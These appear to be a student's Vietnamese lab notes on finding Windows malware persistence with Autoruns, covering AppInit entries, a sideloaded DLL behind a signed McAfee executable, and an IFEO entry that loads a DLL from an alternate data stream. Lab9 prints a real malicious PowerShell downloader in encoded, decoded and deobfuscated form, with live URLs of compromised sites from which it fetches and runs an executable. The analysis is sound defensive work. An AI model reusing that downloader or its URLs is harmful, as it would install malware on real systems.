# lab6 rà soát bằng autorun phát hiện một entry khả nghi chưa được verify:  Lấy hash của file:  Kiểm tra với virustotal:  Kết luận đây là mã độc # lab7 rà soát bằng autorun phát hiện một entry trong appInit chưa được verify:  Kiểm tra file với virustotal:  Kết luận đây chính là mã độc # lab8 Trong quá trình rà soát với autorun, phát hiện chương trình McAfee.exe được persisten thông qua service:  Entry này đã được verify, tuy nhiên khi jump đến image, các dll đi cùng với file exe này không có chữ kí số của McAfee. Default install path của McAfee là `<System_Drive>\ProgramData\McAfee\Agent.`  Kiểm tra hashfile thì xác định được đây là mã độc. File exe có chữ kí số là một file sạch có kí số của McAfee, tuy nhiên các file dll độc được chương trình này load mới là payload chính. [Unpacking the spyware disguised as antivirus](https://www.malwarebytes.com/blog/news/2016/08/unpacking-the-spyware-disguised-as-antivirus) [VNCERT công bố 4 mã độc cần ngăn chặn khẩn cấp sau vụ Vietnam Airlines bị hack](https://esc.vn/vncert-cong-bo-4-ma-doc-can-ngan-chan-khan-cap-sau-vu-vietnam-airlines-bi-hack/) Mã độc này đã được tìm thấy trước đấy liên quan đến các vụ hack vào VNA # lab9 Sử dụng autorun để rà soát, phát hiện powershell được set auto run khi logon:  script được chạy lưu tại `C:\ProgramData\Microsoft\install.ps1`. Nội dung file: ```ps! powershell -w hidden -enco JABFAGEAcQBlAGsAcQBkAHIAPQAnAFIAZABpAGgAeQBoAG8AawByACcAOwAkAFEAbABpAGQAcwB2AG0AZwB4ACAAPQAgACcANgA5ADcAJwA7ACQAWgBlAGsAcABpAHcAYQBmAGkAZwB5AHcAPQAnAEIAegBuAHAAaQBtAHMAZAB6AGgAegAnADsAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAbABpAGQAcwB2AG0AZwB4ACsAJwAuAGUAeABlACcAOwAkAE4AeQB2AGcAZQB1AG4AYQBtAHUAdgBpAD0AJwBRAHcAbABlAGwAbABpAGcAbwB4AGIAJwA7ACQATQBnAHUAZgBwAHYAYQBzAGsAaABsAHoAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AdwBFAEIAQwBsAGkAZQBuAHQAOwAkAFMAbgBvAHQAdQB6AGoAaQA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQByAGYAYQBqAGIAZAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AawB4ADQAMwAyADQAMwA0AC8AKgBoAHQAdABwAHMAOgAvAC8AaABlAGYAbwBrAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANQB6AHUAegA5AGkAcgAwADAANgAwADYALwAqAGgAdAB0AHAAOgAvAC8AaQBjAGwAbwB1AGQAZwByAGEAcABoAGkAYwBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbwAxAGMAdQA3ADYAMgA4AC8AKgBoAHQAdABwADoALwAvAGIAdQBjAGsAZQB0AGwAaQBzAHQAYQBkAHYAdABvAHUAcgBzAC4AYwBvAG0ALwBtADUAXwBlAGQAaQB0AF8AaQB0AGUAbQAvADAANgA2ADAANQBsAGQAMAAzADEAOQA3AC8AKgBoAHQAdABwADoALwAvAG4AYQBhAHYAaQBrAHMAYwBoAG8AbwBsAC4AYwBvAG0ALwBuAGEAYQB2AGkAawBzAGMAaABvAG8AbAAuAGMAbwBtAC8AbwBvAHEAdgBpADcAYQAwADYAOAAyAC8AJwAuACIAUwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAFoAdwBlAGMAcABsAGMAbQBoAG4AegB1AGMAPQAnAE8AZgByAGgAYgB2AGIAZwBvAGMAbwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBpAHgAZQBuAGYAaAB1AHYAeABsAG8AdwAgAGkAbgAgACQAUwBuAG8AdAB1AHoAagBpACkAewB0AHIAeQB7ACQATQBnAHUAZgBwAHYAYQBzAGsAaABsAHoALgAiAGQAYABPAHcATgBgAEwATwBhAGQAYABGAGkAbABFACIAKAAkAFMAaQB4AGUAbgBmAGgAdQB2AHgAbABvAHcALAAgACQARAB2AGIAYQBwAHIAZQB4AGcAbQBlACkAOwAkAEgAagB5AGUAdQB4AG8AZQBoAHIAPQAnAEYAZQBqAGoAbABrAGoAYwB0AHIAagBmAHQAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAKQAuACIATABgAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADcANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAHIAVAAiACgAJABEAHYAYgBhAHAAcgBlAHgAZwBtAGUAKQA7ACQAUABxAGEAYgBiAHEAZgB4AHAAdgB6AGUAdQA9ACcATgBsAGsAdwByAHIAeABjAHIAJwA7AGIAcgBlAGEAawA7ACQAUwBwAGEAcwBrAG0AdwBxAG8APQAnAEUAdgBvAHoAbQB1AHEAbABlAGkAaABrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQBqAGYAcgBvAGkAdwB0AHkAcAB3AD0AJwBNAGgAZQB3AHEAdwBoAHAAaABzACcA ``` sau khi decode từ base64: ```ps! $Eaqekqdr='Rdihyhokr';$Qlidsvmgx = '697';$Zekpiwafigyw='Bznpimsdzhz';$Dvbaprexgme=$env:userprofile+'\'+$Qlidsvmgx+'.exe';$Nyvgeunamuvi='Qwlelligoxb';$Mgufpvaskhlz=.('n'+'ew-o'+'bject') net.wEBClient;$Snotuzji='https://www.arfajbd.com/wp-admin/kx432434/*https://hefok.com/wp-content/5zuz9ir00606/*http://icloudgraphics.com/wp-content/o1cu7628/*http://bucketlistadvtours.com/m5_edit_item/06605ld03197/*http://naavikschool.com/naavikschool.com/ooqvi7a0682/'."SPL`It"('*');$Zwecplcmhnzuc='Ofrhbvbgoco';foreach($Sixenfhuvxlow in $Snotuzji){try{$Mgufpvaskhlz."d`OwN`LOad`FilE"($Sixenfhuvxlow, $Dvbaprexgme);$Hjyeuxoehr='Fejjlkjctrjft';If ((.('G'+'e'+'t-Item') $Dvbaprexgme)."L`E`NGTH" -ge 26474) {[Diagnostics.Process]::"St`ArT"($Dvbaprexgme);$Pqabbqfxpvzeu='Nlkwrrxcr';break;$Spaskmwqo='Evozmuqleihk'}}catch{}}$Imjfroiwtypw='Mhewqwhphs' ``` deobfuscate: ```ps! # Set variables $FileNumber = '697' $FilePath = $env:userprofile + '\' + $FileNumber + '.exe' $WebClient = New-Object Net.WebClient $URLs = 'https://www.arfajbd.com/wp-admin/kx432434/*https://hefok.com/wp-content/5zuz9ir00606/*http://icloudgraphics.com/wp-content/o1cu7628/*http://bucketlistadvtours.com/m5_edit_item/06605ld03197/*http://naavikschool.com/naavikschool.com/ooqvi7a0682/'.Split('*') # Download files from URLs foreach ($URL in $URLs) { try { $WebClient.DownloadFile($URL, $FilePath) # Check file size and execute if conditions are met if ((Get-Item $FilePath).Length -ge 26474) { [Diagnostics.Process]::Start($FilePath) break } } catch {} } ``` Sử dụng PSDecode:  Mã độc được tải từ các trang wordpress mà hacker đã chiếm được quyền kiểm soát sau đó thực thi. # lab10 rà soát với autorun, phát hiện entry `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` và `HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` được set.  vds.exe được set giá trị `rundll32.exe c:\windows\system32\config:conf.dll,inst`:  payload sử dụng NTFS Alternate Data Streams để giấu file `conf.dll`.   kết luận đây là mã độc